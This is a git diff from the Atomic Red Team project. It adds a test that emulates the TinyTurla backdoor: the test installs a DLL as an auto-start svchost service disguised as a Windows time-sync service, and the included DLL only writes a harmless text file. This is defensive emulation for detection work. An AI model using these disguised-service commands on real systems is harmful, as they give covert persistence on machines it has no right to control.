Merge branch 'master' into master

CODE_OF_CONDUCT.md

@@ -1,4 +1,4 @@
-# Contributor Covenant Code of Conduct
+# Contributor Code of Conduct
 
 Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation. 
 

atomics/Indexes/Indexes-CSV/index.csv

@@ -266,6 +266,7 @@ privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscrip
 privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
+privilege-escalation,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
 privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -699,6 +700,7 @@ persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Pe
 persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
+persistence,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
 persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -171,6 +171,7 @@ privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscrip
 privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
+privilege-escalation,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
 privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -464,6 +465,7 @@ persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Pe
 persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
+persistence,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
 persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -455,6 +455,7 @@
   - Atomic Test #1: Modify Fax service to run PowerShell [windows]
   - Atomic Test #2: Service Installation CMD [windows]
   - Atomic Test #3: Service Installation PowerShell [windows]
+  - Atomic Test #4: TinyTurla backdoor service w64time [windows]
 - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
@@ -1158,6 +1159,7 @@
   - Atomic Test #1: Modify Fax service to run PowerShell [windows]
   - Atomic Test #2: Service Installation CMD [windows]
   - Atomic Test #3: Service Installation PowerShell [windows]
+  - Atomic Test #4: TinyTurla backdoor service w64time [windows]
 - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -318,6 +318,7 @@
   - Atomic Test #1: Modify Fax service to run PowerShell [windows]
   - Atomic Test #2: Service Installation CMD [windows]
   - Atomic Test #3: Service Installation PowerShell [windows]
+  - Atomic Test #4: TinyTurla backdoor service w64time [windows]
 - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
@@ -811,6 +812,7 @@
   - Atomic Test #1: Modify Fax service to run PowerShell [windows]
   - Atomic Test #2: Service Installation CMD [windows]
   - Atomic Test #3: Service Installation PowerShell [windows]
+  - Atomic Test #4: TinyTurla backdoor service w64time [windows]
 - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
   - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
   - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]

atomics/Indexes/index.yaml

@@ -20485,6 +20485,36 @@ privilege-escalation:
           Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
           try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
           catch {}
+    - name: TinyTurla backdoor service w64time
+      auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940
+      description: |
+        It's running Dll as service to emulate the tine turla backdoor
+
+        [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
+      supported_platforms:
+      - windows
+      input_arguments:
+        dllfilename:
+          description: It specifies Dll file to run as service
+          type: string
+          default: "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll"
+      executor:
+        command: |-
+          copy #{dllfilename} %systemroot%\system32\
+          sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
+          sc config W64Time DisplayName= "Windows 64 Time"
+          sc description W64Time "Maintain date and time synch on all clients and services in the network"
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
+          sc start W64Time
+        cleanup_command: |-
+          sc stop W64Time
+          sc.exe delete W64Time
+          del %systemroot%\system32\w64time.dll
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
+        name: command_prompt
+        elevation_required: true
   T1547.004:
     technique:
       created: '2020-01-24T16:59:59.688Z'
@@ -50420,6 +50450,36 @@ persistence:
           Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
           try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
           catch {}
+    - name: TinyTurla backdoor service w64time
+      auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940
+      description: |
+        It's running Dll as service to emulate the tine turla backdoor
+
+        [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
+      supported_platforms:
+      - windows
+      input_arguments:
+        dllfilename:
+          description: It specifies Dll file to run as service
+          type: string
+          default: "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll"
+      executor:
+        command: |-
+          copy #{dllfilename} %systemroot%\system32\
+          sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
+          sc config W64Time DisplayName= "Windows 64 Time"
+          sc description W64Time "Maintain date and time synch on all clients and services in the network"
+          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
+          sc start W64Time
+        cleanup_command: |-
+          sc stop W64Time
+          sc.exe delete W64Time
+          del %systemroot%\system32\w64time.dll
+          reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
+        name: command_prompt
+        elevation_required: true
   T1547.004:
     technique:
       created: '2020-01-24T16:59:59.688Z'

atomics/T1543.003/T1543.003.md

@@ -16,6 +16,8 @@ Services may be created with administrator privileges but are executed under SYS
 
 - [Atomic Test #3 - Service Installation PowerShell](#atomic-test-3---service-installation-powershell)
 
+- [Atomic Test #4 - TinyTurla backdoor service w64time](#atomic-test-4---tinyturla-backdoor-service-w64time)
+
 
 <br/>
 
@@ -160,4 +162,53 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - TinyTurla backdoor service w64time
+It's running Dll as service to emulate the tine turla backdoor
+
+[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ef0581fd-528e-4662-87bc-4c2affb86940
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dllfilename | It specifies Dll file to run as service | string | $PathToAtomicsFolder&#92;T1543.003&#92;bin&#92;w64time.dll|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+copy #{dllfilename} %systemroot%\system32\
+sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
+sc config W64Time DisplayName= "Windows 64 Time"
+sc description W64Time "Maintain date and time synch on all clients and services in the network"
+reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
+reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
+sc start W64Time
+```
+
+#### Cleanup Commands:
+```cmd
+sc stop W64Time
+sc.exe delete W64Time
+del %systemroot%\system32\w64time.dll
+reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
+reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
+```
+
+
+
+
+
 <br/>

atomics/T1543.003/T1543.003.yaml

@@ -91,3 +91,33 @@ atomic_tests:
       Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
       try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
       catch {}
+- name: TinyTurla backdoor service w64time
+  auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940
+  description: |
+    It's running Dll as service to emulate the tine turla backdoor
+    
+    [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
+  supported_platforms:
+  - windows
+  input_arguments:
+    dllfilename:
+      description: It specifies Dll file to run as service
+      type: string
+      default: $PathToAtomicsFolder\T1543.003\bin\w64time.dll
+  executor:
+    command: |-
+      copy #{dllfilename} %systemroot%\system32\
+      sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
+      sc config W64Time DisplayName= "Windows 64 Time"
+      sc description W64Time "Maintain date and time synch on all clients and services in the network"
+      reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
+      reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
+      sc start W64Time
+    cleanup_command: |-
+      sc stop W64Time
+      sc.exe delete W64Time
+      del %systemroot%\system32\w64time.dll
+      reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
+    name: command_prompt
+    elevation_required: true

atomics/T1543.003/src/W64Time.cpp

@@ -0,0 +1,98 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "pch.h"
+#include <fstream>
+#include <iostream>
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+                     )
+{
+    switch (ul_reason_for_call)
+    {
+    case DLL_PROCESS_ATTACH:
+    case DLL_THREAD_ATTACH:
+    case DLL_THREAD_DETACH:
+    case DLL_PROCESS_DETACH:
+        break;
+    }
+    return TRUE;
+}
+
+SERVICE_STATUS_HANDLE SvcStatusH;
+
+//Initialize Service_Status Structure serviceType and CurrentState values
+SERVICE_STATUS SvcStatusS =
+{
+    //dwServiceType
+    SERVICE_WIN32_SHARE_PROCESS,
+    //dwCurrentState
+    SERVICE_START_PENDING,
+    //dwControlsAccepted
+    SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_PAUSE_CONTINUE
+};
+
+
+DWORD WINAPI SvcCtrlHandler(
+    DWORD dwControl,
+    DWORD dwEventType,
+    LPVOID lpEventData,
+    LPVOID lpContext
+)
+{
+    // Handle the requested control code. 
+
+    switch (dwControl)
+    {
+    case SERVICE_CONTROL_STOP: //Notifies Service it should stop. Should only return "NO_ERROR". Same action as Service Control Shutdown
+    case SERVICE_CONTROL_SHUTDOWN: //Notifies a service that the system is shutting down so the service can perform cleanup tasks.
+        //Manually set state to "SERVICE_STOPPED" After cleanup commands are run (none in this case)
+        SvcStatusS.dwCurrentState = SERVICE_STOPPED;
+        break;
+    case SERVICE_CONTROL_PAUSE: //Notifies a service that it should pause. 
+        SvcStatusS.dwCurrentState = SERVICE_PAUSED;
+        break;
+    case SERVICE_CONTROL_CONTINUE://Notifies a service that it should Continue after pause.
+        SvcStatusS.dwCurrentState = SERVICE_RUNNING;
+        break;
+    case SERVICE_CONTROL_INTERROGATE:
+        break;
+    default:
+        break;
+    };
+
+    SetServiceStatus(SvcStatusH, &SvcStatusS);
+
+    return NO_ERROR;
+}
+
+VOID main_payload() {
+    using namespace std;
+    ofstream myfile;
+    myfile.open("C:\\ART_W64Time.txt");
+    myfile << "Hello from the Atomic Red Team.\n";
+    myfile.close();
+    return;
+}
+
+extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD dwArgc, LPCWSTR * lpszArgv)
+{
+
+    SvcStatusH = RegisterServiceCtrlHandlerEx(
+        L"W64Time",
+        SvcCtrlHandler,
+        nullptr
+    );
+
+    if (!SvcStatusH)
+    {
+        return;
+    }
+    // Report initial status to the SCM
+
+    SvcStatusS.dwCurrentState = SERVICE_RUNNING;
+
+    SetServiceStatus(SvcStatusH, &SvcStatusS);
+    main_payload();
+
+}

atomics/used_guids.txt

@@ -850,3 +850,4 @@ c510d25b-1667-467d-8331-a56d3e9bc4ff
 deecd55f-afe0-4a62-9fba-4d1ba2deb321
 d239772b-88e2-4a2e-8473-897503401bcc
 eb8da98a-2e16-4551-b3dd-83de49baa14c
+ef0581fd-528e-4662-87bc-4c2affb86940